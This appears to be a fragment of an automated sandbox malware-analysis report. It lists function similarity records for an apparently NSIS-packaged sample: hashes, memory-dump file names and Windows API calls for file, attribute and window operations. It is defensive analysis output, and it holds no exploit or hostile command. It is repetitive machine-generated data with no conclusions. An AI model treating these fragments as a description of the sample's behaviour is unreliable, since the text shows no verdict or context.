                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                            • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                            • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                            • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                            • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                            • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                            • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                            • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                            • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                            • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1818849710-0
                                                                                                                            • Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                            • Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
                                                                                                                            • Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                            • Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID: <@
                                                                                                                            • API String ID: 2738559852-4072043054
                                                                                                                            • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                            • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                            • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                            • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindCloseChangeNotification.KERNEL32 ref: 00403159
                                                                                                                            Strings
                                                                                                                            • 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00403141
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa
• API String ID: 2591292051-244690609
• Opcode ID: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
• Instruction ID: cae25ad1085ea1b7b33e0ee8e1dfa0938857f6c35aa13dd2a3c4ee0daf51729b
• Opcode Fuzzy Hash: 7220984d86149b75493436dbbda63972d97fcd78ed879eff71d07d38dd4f9017
• Instruction Fuzzy Hash: 1FC012B180D7519FC3016F3068494657FB06E11305756487EF8C1A6093D73845048657
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNEL32 ref: 00403292
• SetFilePointer.KERNEL32 ref: 00403316
  • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
Similarity
• API ID: File$PointerReadwsprintf
• String ID:
• API String ID: 2027716870-0
• Opcode ID: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
• Instruction ID: 8e5637f0c6afa0013300979c193a8b9475ce08824852a7f6775797156de60d7d
• Opcode Fuzzy Hash: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
• Instruction Fuzzy Hash: CC31B2719082549FD721DF28C8457EABBF5BB41305F4481BFE88967381CB385A85CF4A
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-0
• Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
• Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
• Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
• Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32 ref: 00407A85
• CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
• Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
• Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
• Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
• SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
• Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
• Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
• Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
• Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
• Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
• Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
Uniqueness

Uniqueness Score: -1.00%

APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                            • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                            • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                            • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                            • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                            • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                            • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32 ref: 00401855
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                            • Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
                                                                                                                            • Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                            • Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1085758737-890720360
                                                                                                                            • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                            • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                            • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                            • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                            • String ID: 8_o$NSIS Software Setup
                                                                                                                            • API String ID: 2207649800-4053800098
                                                                                                                            • Opcode ID: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                            • Instruction ID: 8fd51326f023e27f82ac7456779bc240a2534a06902e8bdd8a27472bfc587b1b
                                                                                                                            • Opcode Fuzzy Hash: a8582859d5a084b14097a1c6a023f97518bcb2a0ac2fe99b7e62435bc4502902
                                                                                                                            • Instruction Fuzzy Hash: 046115B09047089FCB24DFA9C9885AEBBF8FF88310F50892EE499D7251D734A845DF56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                              • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                              • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                              • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                            • wsprintfA.USER32 ref: 004083FF
                                                                                                                            • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                            • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                            • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                              • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                              • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                            • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                            • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                            • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1472977481-890720360
                                                                                                                            • Opcode ID: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                            • Instruction ID: 94d356f40ec1d5b6b18a4eade4987fc681b306d1f2835a3a3d653d78bc44f301
                                                                                                                            • Opcode Fuzzy Hash: 13db83d6b791d1ca6467b22e5dc8b14e389eea567c2d00f0c859e75bf8b65817
                                                                                                                            • Instruction Fuzzy Hash: 70710AB0908305AFD710AF65DA8866FBBF4FF84704F50C82EE9C497251DB789445CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
